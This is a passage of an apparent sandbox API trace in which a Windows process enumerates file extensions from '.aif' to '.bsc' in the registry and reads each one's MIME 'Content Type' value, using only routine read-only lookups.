hKey=0x3f2, lpValueName="Content Type", lpReserved=0x0, lpType=0x19fc10, lpData=0x249ae7c, lpcbData=0x19fc20*=0x16 | out: lpType=0x19fc10*=0x1, lpData="audio/aiff", lpcbData=0x19fc20*=0x16) returned 0x0 [0103.784] CharLowerBuffW (in: lpsz="audio/aiff", cchLength=0xa | out: lpsz="audio/aiff") returned 0xa [0103.784] CharLowerBuffW (in: lpsz=".aif", cchLength=0x4 | out: lpsz=".aif") returned 0x4 [0103.784] RegCloseKey (hKey=0x3f2) returned 0x0 [0103.784] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".aifc", cchCount1=1, lpString2=".", cchCount2=1) returned 2 [0103.784] RegOpenKeyExW (in: hKey=0x80000000, lpSubKey=".aifc", ulOptions=0x0, samDesired=0x20019, phkResult=0x19fc28 | out: phkResult=0x19fc28*=0x3f2) returned 0x0 [0103.784] RegQueryValueExW (in: hKey=0x3f2, lpValueName="Content Type", lpReserved=0x0, lpType=0x19fbfc, lpData=0x0, lpcbData=0x19fc14*=0x0 | out: lpType=0x19fbfc*=0x1, lpData=0x0, lpcbData=0x19fc14*=0x16) returned 0x0 [0103.784] RegQueryValueExW (in: hKey=0x3f2, lpValueName="Content Type", lpReserved=0x0, lpType=0x19fc10, lpData=0x249aea4, lpcbData=0x19fc20*=0x16 | out: lpType=0x19fc10*=0x1, lpData="audio/aiff", lpcbData=0x19fc20*=0x16) returned 0x0 [0103.784] CharLowerBuffW (in: lpsz="audio/aiff", cchLength=0xa | out: lpsz="audio/aiff") returned 0xa [0103.784] CharLowerBuffW (in: lpsz=".aifc", cchLength=0x5 | out: lpsz=".aifc") returned 0x5 [0103.784] RegCloseKey (hKey=0x3f2) returned 0x0 [0103.784] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".aiff", cchCount1=1, lpString2=".", cchCount2=1) returned 2 [0103.784] RegOpenKeyExW (in: hKey=0x80000000, lpSubKey=".aiff", ulOptions=0x0, samDesired=0x20019, phkResult=0x19fc28 | out: phkResult=0x19fc28*=0x3f2) returned 0x0 [0103.784] RegQueryValueExW (in: hKey=0x3f2, lpValueName="Content Type", lpReserved=0x0, lpType=0x19fbfc, lpData=0x0, lpcbData=0x19fc14*=0x0 | out: lpType=0x19fbfc*=0x1, lpData=0x0, lpcbData=0x19fc14*=0x16) returned 0x0 [0103.784] RegQueryValueExW (in: hKey=0x3f2, lpValueName="Content Type", lpReserved=0x0, lpType=0x19fc10, lpData=0x249aecc, lpcbData=0x19fc20*=0x16 | out: lpType=0x19fc10*=0x1, lpData="audio/aiff", lpcbData=0x19fc20*=0x16) returned 0x0 [0103.785] CharLowerBuffW (in: lpsz="audio/aiff", cchLength=0xa | out: lpsz="audio/aiff") returned 0xa [0103.785] CharLowerBuffW (in: lpsz=".aiff", cchLength=0x5 | out: lpsz=".aiff") returned 0x5 [0103.785] RegCloseKey (hKey=0x3f2) returned 0x0 [0103.785] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".amr", cchCount1=1, lpString2=".", cchCount2=1) returned 2 [0103.785] RegOpenKeyExW (in: hKey=0x80000000, lpSubKey=".amr", ulOptions=0x0, samDesired=0x20019, phkResult=0x19fc28 | out: phkResult=0x19fc28*=0x3f2) returned 0x0 [0103.785] RegQueryValueExW (in: hKey=0x3f2, lpValueName="Content Type", lpReserved=0x0, lpType=0x19fbfc, lpData=0x0, lpcbData=0x19fc14*=0x0 | out: lpType=0x19fbfc*=0x0, lpData=0x0, lpcbData=0x19fc14*=0x0) returned 0x2 [0103.785] RegCloseKey (hKey=0x3f2) returned 0x0 [0103.785] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".ani", cchCount1=1, lpString2=".", cchCount2=1) returned 2 [0103.785] RegOpenKeyExW (in: hKey=0x80000000, lpSubKey=".ani", ulOptions=0x0, samDesired=0x20019, phkResult=0x19fc28 | out: phkResult=0x19fc28*=0x3f2) returned 0x0 [0103.785] RegQueryValueExW (in: hKey=0x3f2, lpValueName="Content Type", lpReserved=0x0, lpType=0x19fbfc, lpData=0x0, lpcbData=0x19fc14*=0x0 | out: lpType=0x19fbfc*=0x0, lpData=0x0, lpcbData=0x19fc14*=0x0) returned 0x2 [0103.785] RegCloseKey (hKey=0x3f2) returned 0x0 [0103.785] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".ans", cchCount1=1, lpString2=".", cchCount2=1) returned 2 [0103.785] RegOpenKeyExW (in: hKey=0x80000000, lpSubKey=".ans", ulOptions=0x0, samDesired=0x20019, phkResult=0x19fc28 | out: phkResult=0x19fc28*=0x3f2) returned 0x0 [0103.785] RegQueryValueExW (in: hKey=0x3f2, lpValueName="Content Type", lpReserved=0x0, lpType=0x19fbfc, lpData=0x0, lpcbData=0x19fc14*=0x0 | out: lpType=0x19fbfc*=0x0, lpData=0x0, lpcbData=0x19fc14*=0x0) returned 0x2 [0103.785] RegCloseKey (hKey=0x3f2) returned 0x0 [0103.785] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".api", cchCount1=1, lpString2=".", cchCount2=1) returned 2 [0103.785] RegOpenKeyExW (in: hKey=0x80000000, lpSubKey=".api", ulOptions=0x0, samDesired=0x20019, phkResult=0x19fc28 | out: phkResult=0x19fc28*=0x3f2) returned 0x0 [0103.786] RegQueryValueExW (in: hKey=0x3f2, lpValueName="Content Type", lpReserved=0x0, lpType=0x19fbfc, lpData=0x0, lpcbData=0x19fc14*=0x0 | out: lpType=0x19fbfc*=0x0, lpData=0x0, lpcbData=0x19fc14*=0x0) returned 0x2 [0103.786] RegCloseKey (hKey=0x3f2) returned 0x0 [0103.786] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".appcontent-ms", cchCount1=1, lpString2=".", cchCount2=1) returned 2 [0103.786] RegOpenKeyExW (in: hKey=0x80000000, lpSubKey=".appcontent-ms", ulOptions=0x0, samDesired=0x20019, phkResult=0x19fc28 | out: phkResult=0x19fc28*=0x3f2) returned 0x0 [0103.786] RegQueryValueExW (in: hKey=0x3f2, lpValueName="Content Type", lpReserved=0x0, lpType=0x19fbfc, lpData=0x0, lpcbData=0x19fc14*=0x0 | out: lpType=0x19fbfc*=0x1, lpData=0x0, lpcbData=0x19fc14*=0x46) returned 0x0 [0103.786] RegQueryValueExW (in: hKey=0x3f2, lpValueName="Content Type", lpReserved=0x0, lpType=0x19fc10, lpData=0x23e0ed4, lpcbData=0x19fc20*=0x46 | out: lpType=0x19fc10*=0x1, lpData="application/windows-appcontent+xml", lpcbData=0x19fc20*=0x46) returned 0x0 [0103.786] CharLowerBuffW (in: lpsz="application/windows-appcontent+xml", cchLength=0x22 | out: lpsz="application/windows-appcontent+xml") returned 0x22 [0103.786] CharLowerBuffW (in: lpsz=".appcontent-ms", cchLength=0xe | out: lpsz=".appcontent-ms") returned 0xe [0103.786] RegCloseKey (hKey=0x3f2) returned 0x0 [0103.786] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".application", cchCount1=1, lpString2=".", cchCount2=1) returned 2 [0103.786] RegOpenKeyExW (in: hKey=0x80000000, lpSubKey=".application", ulOptions=0x0, samDesired=0x20019, phkResult=0x19fc28 | out: phkResult=0x19fc28*=0x3f2) returned 0x0 [0103.786] RegQueryValueExW (in: hKey=0x3f2, lpValueName="Content Type", lpReserved=0x0, lpType=0x19fbfc, lpData=0x0, lpcbData=0x19fc14*=0x0 | out: lpType=0x19fbfc*=0x1, lpData=0x0, lpcbData=0x19fc14*=0x3a) returned 0x0 [0103.786] RegQueryValueExW (in: hKey=0x3f2, lpValueName="Content Type", lpReserved=0x0, lpType=0x19fc10, lpData=0x2441b4c, lpcbData=0x19fc20*=0x3a | out: lpType=0x19fc10*=0x1, lpData="application/x-ms-application", lpcbData=0x19fc20*=0x3a) returned 0x0 [0103.787] CharLowerBuffW (in: lpsz="application/x-ms-application", cchLength=0x1c | out: lpsz="application/x-ms-application") returned 0x1c [0103.787] CharLowerBuffW (in: lpsz=".application", cchLength=0xc | out: lpsz=".application") returned 0xc [0103.787] RegCloseKey (hKey=0x3f2) returned 0x0 [0103.787] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".appref-ms", cchCount1=1, lpString2=".", cchCount2=1) returned 2 [0103.787] RegOpenKeyExW (in: hKey=0x80000000, lpSubKey=".appref-ms", ulOptions=0x0, samDesired=0x20019, phkResult=0x19fc28 | out: phkResult=0x19fc28*=0x3f2) returned 0x0 [0103.787] RegQueryValueExW (in: hKey=0x3f2, lpValueName="Content Type", lpReserved=0x0, lpType=0x19fbfc, lpData=0x0, lpcbData=0x19fc14*=0x0 | out: lpType=0x19fbfc*=0x0, lpData=0x0, lpcbData=0x19fc14*=0x0) returned 0x2 [0103.787] RegCloseKey (hKey=0x3f2) returned 0x0 [0103.787] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".appx", cchCount1=1, lpString2=".", cchCount2=1) returned 2 [0103.787] RegOpenKeyExW (in: hKey=0x80000000, lpSubKey=".appx", ulOptions=0x0, samDesired=0x20019, phkResult=0x19fc28 | out: phkResult=0x19fc28*=0x3f2) returned 0x0 [0103.787] RegQueryValueExW (in: hKey=0x3f2, lpValueName="Content Type", lpReserved=0x0, lpType=0x19fbfc, lpData=0x0, lpcbData=0x19fc14*=0x0 | out: lpType=0x19fbfc*=0x0, lpData=0x0, lpcbData=0x19fc14*=0x0) returned 0x2 [0103.787] RegCloseKey (hKey=0x3f2) returned 0x0 [0103.787] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".appxbundle", cchCount1=1, lpString2=".", cchCount2=1) returned 2 [0103.787] RegOpenKeyExW (in: hKey=0x80000000, lpSubKey=".appxbundle", ulOptions=0x0, samDesired=0x20019, phkResult=0x19fc28 | out: phkResult=0x19fc28*=0x3f2) returned 0x0 [0103.787] RegQueryValueExW (in: hKey=0x3f2, lpValueName="Content Type", lpReserved=0x0, lpType=0x19fbfc, lpData=0x0, lpcbData=0x19fc14*=0x0 | out: lpType=0x19fbfc*=0x0, lpData=0x0, lpcbData=0x19fc14*=0x0) returned 0x2 [0103.787] RegCloseKey (hKey=0x3f2) returned 0x0 [0103.788] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".aps", cchCount1=1, lpString2=".", cchCount2=1) returned 2 [0103.788] RegOpenKeyExW (in: hKey=0x80000000, lpSubKey=".aps", ulOptions=0x0, samDesired=0x20019, phkResult=0x19fc28 | out: phkResult=0x19fc28*=0x3f2) returned 0x0 [0103.788] RegQueryValueExW (in: hKey=0x3f2, lpValueName="Content Type", lpReserved=0x0, lpType=0x19fbfc, lpData=0x0, lpcbData=0x19fc14*=0x0 | out: lpType=0x19fbfc*=0x0, lpData=0x0, lpcbData=0x19fc14*=0x0) returned 0x2 [0103.788] RegCloseKey (hKey=0x3f2) returned 0x0 [0103.788] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".arc", cchCount1=1, lpString2=".", cchCount2=1) returned 2 [0103.788] RegOpenKeyExW (in: hKey=0x80000000, lpSubKey=".arc", ulOptions=0x0, samDesired=0x20019, phkResult=0x19fc28 | out: phkResult=0x19fc28*=0x3f2) returned 0x0 [0103.788] RegQueryValueExW (in: hKey=0x3f2, lpValueName="Content Type", lpReserved=0x0, lpType=0x19fbfc, lpData=0x0, lpcbData=0x19fc14*=0x0 | out: lpType=0x19fbfc*=0x0, lpData=0x0, lpcbData=0x19fc14*=0x0) returned 0x2 [0103.788] RegCloseKey (hKey=0x3f2) returned 0x0 [0103.788] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".arj", cchCount1=1, lpString2=".", cchCount2=1) returned 2 [0103.788] RegOpenKeyExW (in: hKey=0x80000000, lpSubKey=".arj", ulOptions=0x0, samDesired=0x20019, phkResult=0x19fc28 | out: phkResult=0x19fc28*=0x3f2) returned 0x0 [0103.831] RegQueryValueExW (in: hKey=0x3f2, lpValueName="Content Type", lpReserved=0x0, lpType=0x19fbfc, lpData=0x0, lpcbData=0x19fc14*=0x0 | out: lpType=0x19fbfc*=0x0, lpData=0x0, lpcbData=0x19fc14*=0x0) returned 0x2 [0103.831] RegCloseKey (hKey=0x3f2) returned 0x0 [0103.831] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".art", cchCount1=1, lpString2=".", cchCount2=1) returned 2 [0103.831] RegOpenKeyExW (in: hKey=0x80000000, lpSubKey=".art", ulOptions=0x0, samDesired=0x20019, phkResult=0x19fc28 | out: phkResult=0x19fc28*=0x3f2) returned 0x0 [0103.831] RegQueryValueExW (in: hKey=0x3f2, lpValueName="Content Type", lpReserved=0x0, lpType=0x19fbfc, lpData=0x0, lpcbData=0x19fc14*=0x0 | out: lpType=0x19fbfc*=0x0, lpData=0x0, lpcbData=0x19fc14*=0x0) returned 0x2 [0103.831] RegCloseKey (hKey=0x3f2) returned 0x0 [0103.831] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".arw", cchCount1=1, lpString2=".", cchCount2=1) returned 2 [0103.831] RegOpenKeyExW (in: hKey=0x80000000, lpSubKey=".arw", ulOptions=0x0, samDesired=0x20019, phkResult=0x19fc28 | out: phkResult=0x19fc28*=0x3f2) returned 0x0 [0103.832] RegQueryValueExW (in: hKey=0x3f2, lpValueName="Content Type", lpReserved=0x0, lpType=0x19fbfc, lpData=0x0, lpcbData=0x19fc14*=0x0 | out: lpType=0x19fbfc*=0x1, lpData=0x0, lpcbData=0x19fc14*=0x14) returned 0x0 [0103.832] RegQueryValueExW (in: hKey=0x3f2, lpValueName="Content Type", lpReserved=0x0, lpType=0x19fc10, lpData=0x249aea4, lpcbData=0x19fc20*=0x14 | out: lpType=0x19fc10*=0x1, lpData="image/ARW", lpcbData=0x19fc20*=0x14) returned 0x0 [0103.832] CharLowerBuffW (in: lpsz="image/ARW", cchLength=0x9 | out: lpsz="image/arw") returned 0x9 [0103.832] CharLowerBuffW (in: lpsz=".arw", cchLength=0x4 | out: lpsz=".arw") returned 0x4 [0103.832] RegCloseKey (hKey=0x3f2) returned 0x0 [0103.832] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".asa", cchCount1=1, lpString2=".", cchCount2=1) returned 2 [0103.832] RegOpenKeyExW (in: hKey=0x80000000, lpSubKey=".asa", ulOptions=0x0, samDesired=0x20019, phkResult=0x19fc28 | out: phkResult=0x19fc28*=0x3f2) returned 0x0 [0103.832] RegQueryValueExW (in: hKey=0x3f2, lpValueName="Content Type", lpReserved=0x0, lpType=0x19fbfc, lpData=0x0, lpcbData=0x19fc14*=0x0 | out: lpType=0x19fbfc*=0x0, lpData=0x0, lpcbData=0x19fc14*=0x0) returned 0x2 [0103.832] RegCloseKey (hKey=0x3f2) returned 0x0 [0103.832] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".asc", cchCount1=1, lpString2=".", cchCount2=1) returned 2 [0103.832] RegOpenKeyExW (in: hKey=0x80000000, lpSubKey=".asc", ulOptions=0x0, samDesired=0x20019, phkResult=0x19fc28 | out: phkResult=0x19fc28*=0x3f2) returned 0x0 [0103.832] RegQueryValueExW (in: hKey=0x3f2, lpValueName="Content Type", lpReserved=0x0, lpType=0x19fbfc, lpData=0x0, lpcbData=0x19fc14*=0x0 | out: lpType=0x19fbfc*=0x0, lpData=0x0, lpcbData=0x19fc14*=0x0) returned 0x2 [0103.833] RegCloseKey (hKey=0x3f2) returned 0x0 [0103.833] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".ascx", cchCount1=1, lpString2=".", cchCount2=1) returned 2 [0103.833] RegOpenKeyExW (in: hKey=0x80000000, lpSubKey=".ascx", ulOptions=0x0, samDesired=0x20019, phkResult=0x19fc28 | out: phkResult=0x19fc28*=0x3f2) returned 0x0 [0103.833] RegQueryValueExW (in: hKey=0x3f2, lpValueName="Content Type", lpReserved=0x0, lpType=0x19fbfc, lpData=0x0, lpcbData=0x19fc14*=0x0 | out: lpType=0x19fbfc*=0x0, lpData=0x0, lpcbData=0x19fc14*=0x0) returned 0x2 [0103.833] RegCloseKey (hKey=0x3f2) returned 0x0 [0103.833] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".asf", cchCount1=1, lpString2=".", cchCount2=1) returned 2 [0103.833] RegOpenKeyExW (in: hKey=0x80000000, lpSubKey=".asf", ulOptions=0x0, samDesired=0x20019, phkResult=0x19fc28 | out: phkResult=0x19fc28*=0x3f2) returned 0x0 [0103.833] RegQueryValueExW (in: hKey=0x3f2, lpValueName="Content Type", lpReserved=0x0, lpType=0x19fbfc, lpData=0x0, lpcbData=0x19fc14*=0x0 | out: lpType=0x19fbfc*=0x1, lpData=0x0, lpcbData=0x19fc14*=0x1e) returned 0x0 [0103.833] RegQueryValueExW (in: hKey=0x3f2, lpValueName="Content Type", lpReserved=0x0, lpType=0x19fc10, lpData=0x24a53cc, lpcbData=0x19fc20*=0x1e | out: lpType=0x19fc10*=0x1, lpData="video/x-ms-asf", lpcbData=0x19fc20*=0x1e) returned 0x0 [0103.833] CharLowerBuffW (in: lpsz="video/x-ms-asf", cchLength=0xe | out: lpsz="video/x-ms-asf") returned 0xe [0103.833] CharLowerBuffW (in: lpsz=".asf", cchLength=0x4 | out: lpsz=".asf") returned 0x4 [0103.833] RegCloseKey (hKey=0x3f2) returned 0x0 [0103.833] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".asm", cchCount1=1, lpString2=".", cchCount2=1) returned 2 [0103.834] RegOpenKeyExW (in: hKey=0x80000000, lpSubKey=".asm", ulOptions=0x0, samDesired=0x20019, phkResult=0x19fc28 | out: phkResult=0x19fc28*=0x3f2) returned 0x0 [0103.834] RegQueryValueExW (in: hKey=0x3f2, lpValueName="Content Type", lpReserved=0x0, lpType=0x19fbfc, lpData=0x0, lpcbData=0x19fc14*=0x0 | out: lpType=0x19fbfc*=0x0, lpData=0x0, lpcbData=0x19fc14*=0x0) returned 0x2 [0103.835] RegCloseKey (hKey=0x3f2) returned 0x0 [0103.835] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".asmx", cchCount1=1, lpString2=".", cchCount2=1) returned 2 [0103.836] RegOpenKeyExW (in: hKey=0x80000000, lpSubKey=".asmx", ulOptions=0x0, samDesired=0x20019, phkResult=0x19fc28 | out: phkResult=0x19fc28*=0x3f2) returned 0x0 [0103.837] RegQueryValueExW (in: hKey=0x3f2, lpValueName="Content Type", lpReserved=0x0, lpType=0x19fbfc, lpData=0x0, lpcbData=0x19fc14*=0x0 | out: lpType=0x19fbfc*=0x0, lpData=0x0, lpcbData=0x19fc14*=0x0) returned 0x2 [0103.837] RegCloseKey (hKey=0x3f2) returned 0x0 [0103.837] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".asp", cchCount1=1, lpString2=".", cchCount2=1) returned 2 [0103.837] RegOpenKeyExW (in: hKey=0x80000000, lpSubKey=".asp", ulOptions=0x0, samDesired=0x20019, phkResult=0x19fc28 | out: phkResult=0x19fc28*=0x3f2) returned 0x0 [0103.837] RegQueryValueExW (in: hKey=0x3f2, lpValueName="Content Type", lpReserved=0x0, lpType=0x19fbfc, lpData=0x0, lpcbData=0x19fc14*=0x0 | out: lpType=0x19fbfc*=0x0, lpData=0x0, lpcbData=0x19fc14*=0x0) returned 0x2 [0103.837] RegCloseKey (hKey=0x3f2) returned 0x0 [0103.837] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".aspx", cchCount1=1, lpString2=".", cchCount2=1) returned 2 [0103.837] RegOpenKeyExW (in: hKey=0x80000000, lpSubKey=".aspx", ulOptions=0x0, samDesired=0x20019, phkResult=0x19fc28 | out: phkResult=0x19fc28*=0x3f2) returned 0x0 [0103.837] RegQueryValueExW (in: hKey=0x3f2, lpValueName="Content Type", lpReserved=0x0, lpType=0x19fbfc, lpData=0x0, lpcbData=0x19fc14*=0x0 | out: lpType=0x19fbfc*=0x0, lpData=0x0, lpcbData=0x19fc14*=0x0) returned 0x2 [0103.837] RegCloseKey (hKey=0x3f2) returned 0x0 [0103.837] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".asx", cchCount1=1, lpString2=".", cchCount2=1) returned 2 [0103.838] RegOpenKeyExW (in: hKey=0x80000000, lpSubKey=".asx", ulOptions=0x0, samDesired=0x20019, phkResult=0x19fc28 | out: phkResult=0x19fc28*=0x3f2) returned 0x0 [0103.838] RegQueryValueExW (in: hKey=0x3f2, lpValueName="Content Type", lpReserved=0x0, lpType=0x19fbfc, lpData=0x0, lpcbData=0x19fc14*=0x0 | out: lpType=0x19fbfc*=0x1, lpData=0x0, lpcbData=0x19fc14*=0x1e) returned 0x0 [0103.838] RegQueryValueExW (in: hKey=0x3f2, lpValueName="Content Type", lpReserved=0x0, lpType=0x19fc10, lpData=0x24a53cc, lpcbData=0x19fc20*=0x1e | out: lpType=0x19fc10*=0x1, lpData="video/x-ms-asf", lpcbData=0x19fc20*=0x1e) returned 0x0 [0103.838] CharLowerBuffW (in: lpsz="video/x-ms-asf", cchLength=0xe | out: lpsz="video/x-ms-asf") returned 0xe [0103.838] CharLowerBuffW (in: lpsz=".asx", cchLength=0x4 | out: lpsz=".asx") returned 0x4 [0103.838] RegCloseKey (hKey=0x3f2) returned 0x0 [0103.838] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".au", cchCount1=1, lpString2=".", cchCount2=1) returned 2 [0103.838] RegOpenKeyExW (in: hKey=0x80000000, lpSubKey=".au", ulOptions=0x0, samDesired=0x20019, phkResult=0x19fc28 | out: phkResult=0x19fc28*=0x3f2) returned 0x0 [0103.838] RegQueryValueExW (in: hKey=0x3f2, lpValueName="Content Type", lpReserved=0x0, lpType=0x19fbfc, lpData=0x0, lpcbData=0x19fc14*=0x0 | out: lpType=0x19fbfc*=0x1, lpData=0x0, lpcbData=0x19fc14*=0x18) returned 0x0 [0103.838] RegQueryValueExW (in: hKey=0x3f2, lpValueName="Content Type", lpReserved=0x0, lpType=0x19fc10, lpData=0x24a542c, lpcbData=0x19fc20*=0x18 | out: lpType=0x19fc10*=0x1, lpData="audio/basic", lpcbData=0x19fc20*=0x18) returned 0x0 [0103.838] CharLowerBuffW (in: lpsz="audio/basic", cchLength=0xb | out: lpsz="audio/basic") returned 0xb [0103.838] CharLowerBuffW (in: lpsz=".au", cchLength=0x3 | out: lpsz=".au") returned 0x3 [0103.838] RegCloseKey (hKey=0x3f2) returned 0x0 [0103.838] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".avi", cchCount1=1, lpString2=".", cchCount2=1) returned 2 [0103.838] RegOpenKeyExW (in: hKey=0x80000000, lpSubKey=".avi", ulOptions=0x0, samDesired=0x20019, phkResult=0x19fc28 | out: phkResult=0x19fc28*=0x3f2) returned 0x0 [0103.839] RegQueryValueExW (in: hKey=0x3f2, lpValueName="Content Type", lpReserved=0x0, lpType=0x19fbfc, lpData=0x0, lpcbData=0x19fc14*=0x0 | out: lpType=0x19fbfc*=0x1, lpData=0x0, lpcbData=0x19fc14*=0x14) returned 0x0 [0103.839] RegQueryValueExW (in: hKey=0x3f2, lpValueName="Content Type", lpReserved=0x0, lpType=0x19fc10, lpData=0x249aea4, lpcbData=0x19fc20*=0x14 | out: lpType=0x19fc10*=0x1, lpData="video/avi", lpcbData=0x19fc20*=0x14) returned 0x0 [0103.839] CharLowerBuffW (in: lpsz="video/avi", cchLength=0x9 | out: lpsz="video/avi") returned 0x9 [0103.839] CharLowerBuffW (in: lpsz=".avi", cchLength=0x4 | out: lpsz=".avi") returned 0x4 [0103.839] RegCloseKey (hKey=0x3f2) returned 0x0 [0103.839] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".aw", cchCount1=1, lpString2=".", cchCount2=1) returned 2 [0103.839] RegOpenKeyExW (in: hKey=0x80000000, lpSubKey=".aw", ulOptions=0x0, samDesired=0x20019, phkResult=0x19fc28 | out: phkResult=0x19fc28*=0x3f2) returned 0x0 [0103.839] RegQueryValueExW (in: hKey=0x3f2, lpValueName="Content Type", lpReserved=0x0, lpType=0x19fbfc, lpData=0x0, lpcbData=0x19fc14*=0x0 | out: lpType=0x19fbfc*=0x0, lpData=0x0, lpcbData=0x19fc14*=0x0) returned 0x2 [0103.839] RegCloseKey (hKey=0x3f2) returned 0x0 [0103.839] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".bas", cchCount1=1, lpString2=".", cchCount2=1) returned 2 [0103.839] RegOpenKeyExW (in: hKey=0x80000000, lpSubKey=".bas", ulOptions=0x0, samDesired=0x20019, phkResult=0x19fc28 | out: phkResult=0x19fc28*=0x3f2) returned 0x0 [0103.839] RegQueryValueExW (in: hKey=0x3f2, lpValueName="Content Type", lpReserved=0x0, lpType=0x19fbfc, lpData=0x0, lpcbData=0x19fc14*=0x0 | out: lpType=0x19fbfc*=0x0, lpData=0x0, lpcbData=0x19fc14*=0x0) returned 0x2 [0103.839] RegCloseKey (hKey=0x3f2) returned 0x0 [0103.839] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".bat", cchCount1=1, lpString2=".", cchCount2=1) returned 2 [0103.840] RegOpenKeyExW (in: hKey=0x80000000, lpSubKey=".bat", ulOptions=0x0, samDesired=0x20019, phkResult=0x19fc28 | out: phkResult=0x19fc28*=0x3f2) returned 0x0 [0103.840] RegQueryValueExW (in: hKey=0x3f2, lpValueName="Content Type", lpReserved=0x0, lpType=0x19fbfc, lpData=0x0, lpcbData=0x19fc14*=0x0 | out: lpType=0x19fbfc*=0x0, lpData=0x0, lpcbData=0x19fc14*=0x0) returned 0x2 [0103.840] RegCloseKey (hKey=0x3f2) returned 0x0 [0103.840] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".bcp", cchCount1=1, lpString2=".", cchCount2=1) returned 2 [0103.840] RegOpenKeyExW (in: hKey=0x80000000, lpSubKey=".bcp", ulOptions=0x0, samDesired=0x20019, phkResult=0x19fc28 | out: phkResult=0x19fc28*=0x3f2) returned 0x0 [0103.840] RegQueryValueExW (in: hKey=0x3f2, lpValueName="Content Type", lpReserved=0x0, lpType=0x19fbfc, lpData=0x0, lpcbData=0x19fc14*=0x0 | out: lpType=0x19fbfc*=0x0, lpData=0x0, lpcbData=0x19fc14*=0x0) returned 0x2 [0103.840] RegCloseKey (hKey=0x3f2) returned 0x0 [0103.840] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".bin", cchCount1=1, lpString2=".", cchCount2=1) returned 2 [0103.840] RegOpenKeyExW (in: hKey=0x80000000, lpSubKey=".bin", ulOptions=0x0, samDesired=0x20019, phkResult=0x19fc28 | out: phkResult=0x19fc28*=0x3f2) returned 0x0 [0103.840] RegQueryValueExW (in: hKey=0x3f2, lpValueName="Content Type", lpReserved=0x0, lpType=0x19fbfc, lpData=0x0, lpcbData=0x19fc14*=0x0 | out: lpType=0x19fbfc*=0x0, lpData=0x0, lpcbData=0x19fc14*=0x0) returned 0x2 [0103.840] RegCloseKey (hKey=0x3f2) returned 0x0 [0103.840] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".bkf", cchCount1=1, lpString2=".", cchCount2=1) returned 2 [0103.840] RegOpenKeyExW (in: hKey=0x80000000, lpSubKey=".bkf", ulOptions=0x0, samDesired=0x20019, phkResult=0x19fc28 | out: phkResult=0x19fc28*=0x3f2) returned 0x0 [0103.840] RegQueryValueExW (in: hKey=0x3f2, lpValueName="Content Type", lpReserved=0x0, lpType=0x19fbfc, lpData=0x0, lpcbData=0x19fc14*=0x0 | out: lpType=0x19fbfc*=0x0, lpData=0x0, lpcbData=0x19fc14*=0x0) returned 0x2 [0103.841] RegCloseKey (hKey=0x3f2) returned 0x0 [0103.841] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".blg", cchCount1=1, lpString2=".", cchCount2=1) returned 2 [0103.841] RegOpenKeyExW (in: hKey=0x80000000, lpSubKey=".blg", ulOptions=0x0, samDesired=0x20019, phkResult=0x19fc28 | out: phkResult=0x19fc28*=0x3f2) returned 0x0 [0103.841] RegQueryValueExW (in: hKey=0x3f2, lpValueName="Content Type", lpReserved=0x0, lpType=0x19fbfc, lpData=0x0, lpcbData=0x19fc14*=0x0 | out: lpType=0x19fbfc*=0x0, lpData=0x0, lpcbData=0x19fc14*=0x0) returned 0x2 [0103.841] RegCloseKey (hKey=0x3f2) returned 0x0 [0103.841] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".bmp", cchCount1=1, lpString2=".", cchCount2=1) returned 2 [0103.841] RegOpenKeyExW (in: hKey=0x80000000, lpSubKey=".bmp", ulOptions=0x0, samDesired=0x20019, phkResult=0x19fc28 | out: phkResult=0x19fc28*=0x3f2) returned 0x0 [0103.841] RegQueryValueExW (in: hKey=0x3f2, lpValueName="Content Type", lpReserved=0x0, lpType=0x19fbfc, lpData=0x0, lpcbData=0x19fc14*=0x0 | out: lpType=0x19fbfc*=0x1, lpData=0x0, lpcbData=0x19fc14*=0x14) returned 0x0 [0103.841] RegQueryValueExW (in: hKey=0x3f2, lpValueName="Content Type", lpReserved=0x0, lpType=0x19fc10, lpData=0x249aea4, lpcbData=0x19fc20*=0x14 | out: lpType=0x19fc10*=0x1, lpData="image/bmp", lpcbData=0x19fc20*=0x14) returned 0x0 [0103.841] CharLowerBuffW (in: lpsz="image/bmp", cchLength=0x9 | out: lpsz="image/bmp") returned 0x9 [0103.841] CharLowerBuffW (in: lpsz=".bmp", cchLength=0x4 | out: lpsz=".bmp") returned 0x4 [0103.841] RegCloseKey (hKey=0x3f2) returned 0x0 [0103.841] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".bsc", cchCount1=1, 